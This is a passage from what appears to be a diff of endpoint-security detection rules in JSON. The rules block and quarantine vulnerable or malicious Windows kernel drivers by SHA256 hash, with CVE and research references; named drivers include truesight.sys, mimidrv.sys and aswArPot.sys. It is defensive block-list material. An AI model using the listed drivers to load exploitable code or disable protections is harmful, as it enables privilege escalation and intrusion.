SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "382dd39d-fe1f-5e7f-b8b6-93f11c077cc0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825394Z", + "creation_date": "2026-03-23T11:45:30.825398Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825406Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e8e9ae67f2ebe8986f434a22d4c175cf0ad77d8a580c26b5c04d6c183c2b8bbf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3834aaa8-32f2-5225-b81a-bf88d2b71206", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820478Z", + "creation_date": "2026-03-23T11:45:30.820480Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820485Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe275be26ecca4c69f1c8ec35145fcae8cd83a5cb20f7ca71ff998d91091bb7e", + "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3835020e-8b74-552c-9074-f275d18879b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977817Z", + "creation_date": "2026-03-23T11:45:29.977819Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977824Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b7516dca419d087ef844c42e061a834908f34e7363577ab128094973896222c8", + "comment": "Vulnerable Kernel Driver (aka b4.sys) [https://www.loldrivers.io/drivers/d1441172-cc15-4a96-b782-f440bfb681e1/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38385f10-7079-5122-8ce2-ce44c4f1baa5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981332Z", + "creation_date": "2026-03-23T11:45:29.981333Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981339Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c35f3a9da8e81e75642af20103240618b641d39724f9df438bf0f361122876b0", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3843fbd7-2154-5e62-b0fe-35b7fabf475f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612992Z", + "creation_date": "2026-03-23T11:45:29.612994Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612999Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"5e1e1489a1a01cfb466b527543d9d25112a83792bde443de9e34e4d3ada697e3", + "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38468b67-d59b-5ea3-82bd-501e04680e3e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611167Z", + "creation_date": "2026-03-23T11:45:29.611169Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611174Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "98c86fcf018822289340d248f5e2896c41ad0f284febb741b945312ff40bdfa3", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "384abeb1-9e40-5b9b-8651-c0bf7db44e1a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824997Z", + "creation_date": "2026-03-23T11:45:31.825000Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825009Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "563a30a08dcb636e9dd894dcfeaf36a6da3483a32275c00ec57c5c0f13916e3c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3852d8a4-abbd-5d04-a5de-bda628c4d8d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827676Z", + "creation_date": "2026-03-23T11:45:31.827678Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827684Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "59b52a009ceed6c2a9e9efc84117bfca18b0b1ed1168c28c6e6a7a1b05ba45a7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3855274c-d30b-5554-9a57-45e3cc281be5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140529Z", + "creation_date": "2026-03-23T11:45:31.140531Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140536Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ce9f5e121384d24730c10fa0b6dfe58d9fc571b4e7b42e15482e210a387667cd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "385ae001-036a-530b-bab0-ad0d9e50e48b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482027Z", + "creation_date": 
"2026-03-23T11:45:31.482031Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482041Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "586d362f8801c8b2283d65172a3d53e87c9723efcdee239c5deb6dc6d100f2fa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "386a35ca-3db3-5a0c-b2a4-593179209368", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622909Z", + "creation_date": "2026-03-23T11:45:29.622911Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622916Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb7cb120d51e217ee4cc50bee619603be5eb6091634df45acc5249aed283c9be", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "386f6fd4-b740-5d17-ba4a-1f2946f6c96d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456723Z", + "creation_date": "2026-03-23T11:45:30.456726Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456735Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a38c26c0754f6c9389ea43dd0149db26b95742c1b37468fcf0d8ced66da1dcb9", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3871fcc7-79c8-59aa-9448-76cde3b803c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147769Z", + "creation_date": "2026-03-23T11:45:31.147771Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.147777Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a32e9b71040976b39ddd57f36b48732ee1b9c5ad09dc0e4e905e6f59b904a301", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38764b2a-7cf1-5e17-b347-e51b416cc591", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466637Z", + "creation_date": "2026-03-23T11:45:30.466640Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466648Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "82b7fa34ad07dbf9afa63b2f6ed37973a1b4fe35dee90b3cf5c788c15c9f08f7", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3894b46c-f3ee-5bf8-8f9e-ddd9031417a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462314Z", + "creation_date": "2026-03-23T11:45:30.462317Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462326Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19bfc95d74b27684e420b985589105d51772100383e7c3790a34ae311fee03d8", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38ac0c0e-9c68-5337-a655-47b970ff8ce3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821078Z", + "creation_date": "2026-03-23T11:45:30.821081Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821090Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"61e7f9a91ef25529d85b22c39e830078b96f40b94d00756595dded9d1a8f6629", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38ae8fad-1131-56c7-b5be-610fd02d2e81", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816630Z", + "creation_date": "2026-03-23T11:45:31.816634Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816662Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "599713f2250bd98187c4f1a8accf00552349ad4036a71c8f5fea0bf3ac7c39a6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38b79364-ff42-5fd7-8927-0b3a4019337b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972491Z", + "creation_date": "2026-03-23T11:45:29.972493Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972498Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18deed37f60b6aa8634dda2565a0485452487d7bce88afb49301a7352db4e506", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38c27d61-35b3-5c2c-830f-5d1938c600ae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975828Z", + "creation_date": "2026-03-23T11:45:29.975832Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975840Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea80b4a2314e44061f33a7403e0740437aa34326082e97816bb6e7693866478b", + "comment": "Novell XTier vulnerable driver (aka libnicm.sys) 
[https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38c70840-a01c-5c5b-8448-650475888eb7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811222Z", + "creation_date": "2026-03-23T11:45:31.811224Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811230Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d223236124458c2e7c2373cf3fa86652516bf0b5cff91b6e142867d1e3d26a6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38c8d154-a778-54a5-803a-1f40a4801553", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968439Z", + "creation_date": "2026-03-23T11:45:29.968441Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968446Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38d8cddf-a3a4-5fd6-b9b6-9073836f94e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619371Z", + "creation_date": "2026-03-23T11:45:29.619373Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619379Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e46bb410c3bb95a1f3d61ced157c679bfac7dc997534e46b83b234a6fc5cbb14", + "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38e46f37-c81d-5706-87de-89ec1285dff9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146275Z", + "creation_date": "2026-03-23T11:45:32.146279Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146288Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "01d51df682136cce453bb1da8964073e6bc7297ce4dae7301c753bb618a69469", + "comment": "Vulnerable Kernel Driver (aka ampa.sys) [https://www.loldrivers.io/drivers/ea0e7351-b65c-4c5a-9863-83b9d5efcec3/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38e854fa-4638-51c8-9a42-fde360771eec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144158Z", + "creation_date": "2026-03-23T11:45:31.144160Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.144166Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6a51e10099132a96829845dd8f6aaac1a8ba71d9fdabacc5068580eb89211ad6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "38ec04fd-1785-52ca-bbe6-752758d981cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824060Z", + "creation_date": "2026-03-23T11:45:30.824063Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824068Z", + "rule_level": null, 